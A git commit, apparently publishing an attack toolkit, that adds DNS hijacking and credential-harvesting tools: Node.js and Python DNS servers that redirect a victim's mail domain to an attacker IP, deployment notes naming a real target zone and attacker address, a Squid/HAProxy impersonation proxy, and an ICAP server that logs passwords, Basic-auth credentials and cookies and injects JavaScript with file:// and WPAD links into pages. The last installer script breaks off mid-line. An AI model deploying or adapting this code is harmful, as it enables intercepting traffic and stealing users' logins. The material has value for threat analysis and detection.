This commit is contained in:
blackorbird
2019-04-18 11:19:12 +08:00
parent f6c2839353
commit b3c7e3e449
495 changed files with 73786 additions and 0 deletions


@@ -0,0 +1,8 @@
{
"overrides":{
"victim_domain": "127.0.0.1"
},
"zones":[
"victim_domain"
]
}


@@ -0,0 +1,98 @@
var dns = require('native-dns');
var fs = require('fs');
var domainName = ['mail.<victim domain>', 'dns.<victim domain>'];
var zone = 'hostA.example.org';
var authorative = '<original nameserver ip>'; //must be ip
var responseIP = 'attacker server ip';
var server = dns.createServer();
function replaceAll(target, search, replacement) {
return target.replace(new RegExp(search, 'g'), replacement);
};
server.on('request', function (request, response) {
for(var i = 0; i < 1; i++)
{
var q = request.question[i].name.toLowerCase();
console.log('request = ' + q);
if(domainName.indexOf(q) > -1 && request.question[i].type == 1)
{
response.answer.push(dns.A({
name: request.question[i].name,
address: responseIP,
ttl: 600,
}));
response.send();
}
else if(q.indexOf(zone) != -1)
{
//redirect
//if(request.question[i].type == 1)
{
var question2 = dns.Question(request.question[i]);
/*question: dns.Question({
name: request.question[i].name,
type: 'A'
})
*/
var req = dns.Request({
question: question2,
server: { address: authorative, port: 53, type: 'udp' },
timeout: 1000,
});
req.on('timeout', function () {
console.log('Timeout in making request');
});
req.on('message', function (err, answer) {
//console.log(JSON.stringify(answer));
for (var j = answer.answer.length - 1; j >= 0; j--) {
//console.log(answer.answer[j]);
//if(answer.answer[j].type == 1)
{
response.answer.push(answer.answer[j]);
/*
response.answer.push(dns.A({
name: answer.answer[j].name,
address: answer.answer[j].address,
ttl: 600,
}));
*/
}
}
});
req.on('end', function () {
console.log('Finished processing request');
response.send();
});
console.log('sent ' + request.question[i].name)
req.send();
}
}
}
/*
response.answer.push(dns.A({
name: request.question[0].name,
address: '127.0.0.2',
ttl: 600,
}));
response.additional.push(dns.A({
name: 'hostA.example.org',
address: '127.0.0.3',
ttl: 600,
}));
*/
});
server.on('error', function (err, buff, req, res) {
console.log(err);
});
server.serve(53);


@@ -0,0 +1,80 @@
import socket
import SocketServer
import dnslib
import sys
import json
config_file = sys.argv[1]
redir_server = sys.argv[2]
host = "0.0.0.0"
port = 53
overrides = {}
zones = []
TTL = 60 * 5
def parse_config(config_file):
f = open(config_file)
config = json.loads(f.read())
f.close()
return config
class MyUDPHandler(SocketServer.BaseRequestHandler):
def inZone(self, packet):
try:
record = dnslib.DNSRecord.parse(packet).q
f = open('log.txt', 'a')
f.write(str(record) + '\n')
f.close()
print record
except:
return False
for zone in zones:
if str(record.qname).lower().endswith(zone):
return True
return False
def override(self, packet):
dns_record = dnslib.DNSRecord.parse(packet)
if str(dns_record.q.qname).lower() in overrides and dns_record.q.qtype == dnslib.QTYPE.A:
dns_record.rr = [dnslib.RR(rname=dns_record.q.qname, rtype=dnslib.QTYPE.A, rclass=1, ttl=TTL, rdata=dnslib.A(overrides[str(dns_record.q.qname).lower()]))]
print 'overrride', dns_record.rr[0]
'''
while True:
change = False
for i in range(0, len(dns_record.rr)):
if str(dns_record.rr[i].rname).lower() in overrides:
if dns_record.rr[i].rtype == dnslib.QTYPE.A and str(dns_record.rr[i].rdata) != overrides[str(dns_record.rr[i].rname).lower()]:
dns_record.rr[i].rdata = dnslib.A(overrides[str(dns_record.rr[i].rname).lower()])
change = True
print dns_record.rr[i]
if dns_record.rr[i].rtype == dnslib.QTYPE.CNAME and str(dns_record.rr[i].rdata).lower() not in overrides:
overrides[str(dns_record.rr[i].rdata).lower()] = overrides[str(dns_record.rr[i].rname).lower()]
change = True
print dns_record.rr[i]
if not change:
break
'''
return dns_record.pack()
def handle(self):
print self.client_address
data = self.request[0].strip()
input_socket = self.request[1]
if self.inZone(data):
redir_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
redir_socket.sendto(data, (redir_server, 53))
answer = redir_socket.recv(2048)
redir_socket.close()
answer = self.override(answer)
input_socket.sendto(answer, self.client_address)
#input_socket.close()
config = parse_config(config_file)
overrides = config['overrides']
zones = config['zones']
server = SocketServer.UDPServer((host, port), MyUDPHandler)
server.serve_forever()


@@ -0,0 +1,150 @@
apt-get update
apt-get install vim
apt-get install screen
----Solution 1
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
rm -f get-pip.py
pip install dnslib
<copy dns_redir>
cd dns_redir
<edit config.json>
screen
python dnsd.py config.json <original nameserver>
<exit screen (Ctrl+A -> Ctrl_D)>
----Solution2 (use this)
apt-get install curl
apt-get install sudo
curl -sL https://deb.nodesource.com/setup_6.x | sudo -E bash -
sudo apt-get install -y nodejs
npm install -g forever
npm install -g forever-service
<copy dns_redir>
cd dns_redir
npm install native-dns
<edit dnsd.js>
var zone = 'tra.gov.ae';
var domainName = ['webmail.tra.gov.ae', 'dns.tra.gov.ae'];
var zone = 'tra.gov.ae';
var authorative = '195.229.237.52'; //must be ip
var responseIP = '185.162.235.106';
var server = dns.createServer();
forever-service install dns-server --script dnsd.js --start
**-----------------------------------------------ta inja
<copy icap server script>
ipcocd icap
screen
python icap.py
<exit screen (Ctrl+A -> Ctrl_D)>
cd /opt
apt-get install openssl devscripts build-essential libssl-dev apache2 squid-langpack
apt-get source squid3
apt-get build-dep squid3
cd squid3-3.4.8
vim debian/rules
<insert below lines in DEB_CONFIGURE_EXTRA_FLAGS section>
--enable-ssl \
--enable-ssl-crtd \
--with-open-ssl="/etc/ssl/openssl.cnf" \
debuild -us -uc
cd ..
dpkg -i *.deb
apt-get install -f
service apache2 stop
service squid3 stop
cd /etc/squid3/
mv squid.conf squid.conf.bckp
vim squid.conf
<insert below lines>
visible_hostname edge.<target-zone>
#http_port 80 accel defaultsite=<target-domain> no-vhost
#https_port 443 accel cert=/etc/letsencrypt/live/<target-domain>/fullchain.pem key=/etc/letsencrypt/live/<target-domain>/privkey.pem defaultsite=<target-domain> no-vhost
#cache_peer <original-target-ip> parent 80 0 no-query originserver name=webmask
#cache_peer <original-target-ip> parent 443 0 no-query originserver sslflags=DONT_VERIFY_PEER,DONT_VERIFY_DOMAIN login=PASS ssl front-end-https=on name=webmask
acl target_sites dstdomain <target-domain>
http_access allow target_sites
cache_peer_access webmask allow target_sites
cache_peer_access webmask deny all
icap_enable on
icap_persistent_connections off
adaptation_send_client_ip on
adaptation_masterx_shared_names X-Data
icap_service password_req reqmod_precache bypass=1 icap://127.0.0.1:1344/password
#icap_service password_resp respmod_precache bypass=1 icap://127.0.0.1:1344/password
icap_service cookie_req reqmod_precache bypass=1 icap://127.0.0.1:1344/cookie
#icap_service cookie_resp respmod_precache bypass=1 icap://127.0.0.1:1344/cookie
#icap_service inject_req reqmod_precache bypass=1 icap://127.0.0.1:1344/inject
icap_service inject_resp respmod_precache bypass=1 icap://127.0.0.1:1344/inject
icap_service headers_req reqmod_precache bypass=1 icap://127.0.0.1:1344/headers
#icap_service headers_resp respmod_precache bypass=1 icap://127.0.0.1:1344/headers
icap_service basic_req reqmod_precache bypass=1 icap://127.0.0.1:1344/basic
#icap_service basic_resp respmod_precache bypass=1 icap://127.0.0.1:1344/basic
adaptation_service_chain service_req password_req basic_req
#adaptation_service_chain service_resp
adaptation_access service_req allow all
#adaptation_access service_resp allow all
<replace target-domain and original-target-ip by its values>
<uncomment http_port and https_port if you want>
<uncomment which cache_peer you want>
<add needed icap_services to adaptation_service_chain>
<scan target server and find open ports>
nmap -vvv <original-target-ip>
apt-get install haproxy
cd /etc/haproxy/
vim haproxy.cfg
<comment below lines>
mode http
option httplog
<insert below lines for all of open port>
frontend ft_<port>
bind :<port>
mode tcp
default_backend bk_<port>
backend bk_<port>
mode tcp
balance roundrobin
stick-table type ip size 200k expire 30m
stick on src
default-server inter 1s
server s1 <original-target-ip>:<port> check id 1
<check no process listen on target ports>
netstat -nlp
service haproxy restart
---------------------------------------------
<change target domain nameserver and wait the change apply>
---------------------------------------------
<if you want get valid certificate for squid>
vim /etc/apt/sources.list
<insert below lines>
deb http://ftp.debian.org/debian jessie-backports main
deb-src http://ftp.debian.org/debian jessie-backports main
apt-get update
apt-get install certbot -t jessie-backports
vim /etc/haproxy/haproxy.cfg
<comment sections related to port 443>
service haproxy restart
certbot certonly --standalone -n -m <recovery-email> --agree-tos -d <target-domain>
vim /etc/haproxy/haproxy.cfg
<uncomment sections related to port 443>
service haproxy restart
vim /etc/haproxy/haproxy.cfg
<comment sections related to squid ports>
service haproxy restart
service squid3 start


@@ -0,0 +1,297 @@
#!/bin/env python
# -*- coding: utf8 -*-
import random
import SocketServer
import re
import json
import traceback
import gzip
from threading import Thread
from pyicap import *
from dateutil import parser
from datetime import *
from StringIO import *
credentials_file = 'credentials.txt'
log_file = 'log.txt'
cookies_file = 'cookies.txt'
inject_file = 'injected.txt'
headers_file = 'headers.txt'
script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'
days = 3000
port = 1344
def log_to_file(path, log):
f = open(path, 'a+')
f.write(log + '\n')
f.close()
def extract_login_password(date, ip, url, body):
usernames = []
passwords = []
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena', 'secret']
logins = ['login', 'log-in', 'log_in', 'signin', 'sign-in', 'logon', 'log-on']
for login in userfields:
login_re = re.search('([^&]*%s[^=]*=[^&]+)' % login, body, re.IGNORECASE)
if login_re and len(login_re.group()) < 75:
usernames.append(login_re.group())
for passfield in passfields:
pass_re = re.search('([^&]*%s[^=]*=[^&]+)' % passfield, body, re.IGNORECASE)
if pass_re and len(pass_re.group()) < 75:
passwords.append(pass_re.group())
if len(usernames) > 0 and len(passwords) > 0:
log = {'date': date, 'ip': ip, 'type': 'login_password', 'url': url, 'usernames': usernames, 'passwords': passwords}
log_string = json.dumps(log, indent=4)
log_to_file(credentials_file, log_string)
print log_string
for login in logins:
if re.search(login, url, re.IGNORECASE):
log = {'date': date, 'ip': ip, 'type': 'login_url', 'url': url, 'body': body}
log_string = json.dumps(log, indent=4)
log_to_file(credentials_file, log_string)
class ThreadingSimpleServer(SocketServer.ThreadingMixIn, ICAPServer):
pass
class ICAPHandler(BaseICAPRequestHandler):
def password_OPTIONS(self):
self.set_icap_response(200)
#self.set_icap_header('Methods', 'RESPMOD')
self.set_icap_header('Methods', 'REQMOD')
self.set_icap_header('Preview', '0')
self.send_headers(False)
def password_REQMOD(self):
try:
date = str(parser.parse(self.headers['date'][0]))
ip = self.headers['x-client-ip'][0]
method = self.enc_req[0]
url = self.enc_req[1]
log_string = '{0}\t{1}\t{2}\t{3}'.format(date, ip, method, url)
log_to_file(log_file, log_string)
#print log_string
if '204' not in self.allow and self.preview == None:
self.set_icap_response(200)
self.set_enc_request(' '.join(self.enc_req))
for h in self.enc_req_headers:
for v in self.enc_req_headers[h]:
self.set_enc_header(h, v)
if not self.has_body:
self.send_headers(False)
self.log_request(200)
return
self.send_headers(True)
body = ''
while self.has_body:
#print 'read start'
chunk = self.read_chunk()
#print 'read done', len(chunk)
if '204' not in self.allow and self.preview == None:
self.write_chunk(chunk)
if chunk == '':
if method == 'POST':
thread = Thread(target = extract_login_password, args = (date, ip, url, body))
thread.start()
break
elif method == 'POST':
body += chunk
if '204' in self.allow or self.preview != None:
self.set_icap_response(204)
self.send_headers()
#self.no_adaptation_required()
except:
traceback.print_exc()
raise
#def password_RESPMOD(self):
# self.no_adaptation_required()
def basic_OPTIONS(self):
self.set_icap_response(200)
#self.set_icap_header('Methods', 'RESPMOD')
self.set_icap_header('Methods', 'REQMOD')
self.set_icap_header('Preview', '0')
self.send_headers(False)
def basic_REQMOD(self):
try:
date = str(parser.parse(self.headers['date'][0]))
ip = self.headers['x-client-ip'][0]
method = self.enc_req[0]
url = self.enc_req[1]
if 'authorization' in self.enc_req_headers and self.enc_req_headers['authorization'][0].startswith('Basic'):
cred = self.enc_req_headers['authorization'][0].split(' ')[1].decode('base64')
log = {'date': date, 'ip': ip, 'type':'basic_auth', 'url': url, 'cred': cred}
log_string = json.dumps(log, indent=4)
log_to_file(credentials_file, log_string)
#print log_string
if '204' not in self.allow and self.preview == None:
self.set_icap_response(200)
self.set_enc_request(' '.join(self.enc_req))
for h in self.enc_req_headers:
for v in self.enc_req_headers[h]:
self.set_enc_header(h, v)
self.send_headers(True)
while self.has_body:
#print 'read start'
chunk = self.read_chunk()
#print 'read done', len(chunk)
if '204' not in self.allow and self.preview == None:
self.write_chunk(chunk)
if chunk == '':
break
if '204' in self.allow or self.preview != None:
self.set_icap_response(204)
self.send_headers()
#self.no_adaptation_required()
except:
traceback.print_exc()
raise
#def basic_RESPMOD(self):
# self.no_adaptation_required()
def headers_OPTIONS(self):
self.set_icap_response(200)
#self.set_icap_header('Methods', 'RESPMOD')
self.set_icap_header('Methods', 'REQMOD')
self.set_icap_header('Preview', '0')
self.send_headers(False)
def headers_REQMOD(self):
date = str(parser.parse(self.headers['date'][0]))
ip = self.headers['x-client-ip'][0]
method = self.enc_req[0]
url = self.enc_req[1]
for header in self.enc_req_headers:
log_string = '{0}\t{1}\t{2}\t{3}'.format(date, ip, url, self.enc_req_headers[header][0])
log_to_file(headers_file, log_string)
self.no_adaptation_required()
#def headers_RESPMOD(self):
# self.no_adaptation_required()
def cookie_OPTIONS(self):
self.set_icap_response(200)
#self.set_icap_header('Methods', 'RESPMOD')
self.set_icap_header('Methods', 'REQMOD')
self.set_icap_header('Preview', '0')
self.send_headers(False)
def cookie_REQMOD(self):
date = str(parser.parse(self.headers['date'][0]))
ip = self.headers['x-client-ip'][0]
method = self.enc_req[0]
url = self.enc_req[1]
if 'cookie' in self.enc_req_headers:
cookies = self.enc_req_headers['cookie'][0]
log_string = '{0}\t{1}\t{2}\t{3}'.format(date, ip, url, cookies)
log_to_file(cookies_file, log_string)
self.no_adaptation_required()
#def cookie_RESPMOD(self):
# self.no_adaptation_required()
def inject_OPTIONS(self):
self.set_icap_response(200)
self.set_icap_header('Methods', 'RESPMOD')
#self.set_icap_header('Methods', 'REQMOD')
self.set_icap_header('Preview', '0')
self.send_headers(False)
#def inject_REQMOD(self):
# self.no_adaptation_required()
def inject_RESPMOD(self):
date = str(parser.parse(self.headers['date'][0]))
ip = self.headers['x-client-ip'][0]
method = self.enc_req[0]
url = self.enc_req[1]
referer = ''
if 'referer' in self.enc_req_headers:
referer = self.enc_req_headers['referer'][0]
agent = ''
if 'user-agent' in self.enc_req_headers:
referer = self.enc_req_headers['user-agent'][0]
status = self.enc_res_status[1]
message = self.enc_res_status[2]
if 'content-type' in self.enc_res_headers and 'javascript' in self.enc_res_headers['content-type'][0]: #re.search('^[^\?]*\.js(\?.*)?$', url):
log_string = '{0}\t{1}\t{2}\t{3}\t{4}\t{5}\t{6}'.format(date, ip, status, method, url, referer, agent)
log_to_file(inject_file, log_string)
print log_string
compress = 'uncompress'
if 'content-encoding' in self.enc_res_headers:
if 'gzip' in self.enc_res_headers['content-encoding']:
compress = 'gzip'
if compress not in ['uncompress', 'gzip']:
self.no_adaptation_required()
return
body = ''
if self.has_body:
while True:
chunk = self.read_chunk()
body += chunk
if chunk == '':
break
if compress == 'gzip':
buf = StringIO(body)
body = gzip.GzipFile(fileobj=buf).read()
body += script
if compress == 'gzip':
temp = ''
buf = StringIO(temp)
gzip.GzipFile(fileobj=buf, mode='w').write(body)
body = buf.getvalue()
self.set_icap_response(200)
self.set_enc_status(' '.join(self.enc_res_status))
for h in self.enc_res_headers:
for v in self.enc_res_headers[h]:
if h == 'content-length':
self.set_enc_header(h, str(len(body)))
elif h == 'cache-control':
pass
elif h == 'expires':
pass
elif h == 'etag':
pass
else:
self.set_enc_header(h, v)
now = datetime.today()
delta = timedelta(days)
expires = now + delta
self.set_enc_header('expires', expires.strftime('%A, %d %b %Y %H:%M:%S GMT'))
self.set_enc_header('cache-control', 'max-age=' + str(int(delta.total_seconds())))
if not self.has_body:
self.send_headers(False)
return
self.send_headers(True)
self.write_chunk(body)
self.write_chunk('')
return
self.no_adaptation_required()
server = ThreadingSimpleServer(('127.0.0.1', port), ICAPHandler)
try:
while 1:
server.handle_request()
except KeyboardInterrupt:
print 'Finished'


@@ -0,0 +1,40 @@
#!/bin/bash
apt-get update
apt-get install vim
apt-get install screen
apt-get install curl
apt-get install sudo
curl -sL https://deb.nodesource.com/setup_6.x | sudo -E bash -
sudo apt-get install -y nodejs
npm install -g forever
npm install -g forever-service
npm install native-dns
echo -e "\033[1m Please Choose DNS zone For Panel : google.com\033[0m"
read wbemzone
echo -e "\033[1m Please Choose Webmail For Panel : webmail.google.com\033[0m"
read wbemwebmail
echo -e "\033[1m Please Choose Webmail For Panel : webmail.google.com\033[0m"
read wbemwebmail
echo -e "\033[1m Please Choose authorative ip For Panel : \033[0m"
read wbemauthorativeip
echo -e "\033[1m Please Choose Server IP For Panel : webmail.google.com\033[0m"
read wbemserverip
authorative